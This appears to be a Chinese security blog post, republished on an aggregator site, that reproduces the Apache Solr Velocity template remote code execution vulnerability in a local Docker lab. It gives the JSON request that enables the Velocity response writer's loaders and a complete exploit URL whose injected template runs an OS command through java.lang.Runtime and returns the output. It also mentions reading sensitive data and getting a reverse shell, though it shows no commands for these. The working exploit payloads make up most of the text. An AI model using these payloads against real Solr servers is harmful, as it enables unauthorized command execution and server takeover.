Apache Solr Velocity模板远程代码执行

Posted 论安全萌新的自我修养

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Apache Solr Velocity模板远程代码执行相关的知识,希望对你有一定的参考价值。

更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

这里用的docker环境 很简单的 在这里不再介绍

本地搭建好环境然后访问8983端口 网页如下:

 

查下节点名称

 

同样名字可以访问http://192.168.35.185:8983/solr/admin/cores获取到名字

 

看下config的 红圈的这里两个点必须为true

通过发包来构造出来

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

 

随后开始命令执行

http://192.168.35.185:8983/solr/test/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

 

 读取敏感信息

反弹shell拿管控权限

 

 

 更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

以上是关于Apache Solr Velocity模板远程代码执行的主要内容,如果未能解决你的问题,请参考以下文章

Apache Solr Velocity模板远程代码执行

网警提醒关于Apache Solr Velocity模板远程代码执行漏洞的预警通报

通告更新Apache Solr模板注入远程代码执行漏洞安全风险通告

Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)

Apache Solr Velocity模板注入RCE漏洞复现

Apache Solr velocity模板注入RCE漏洞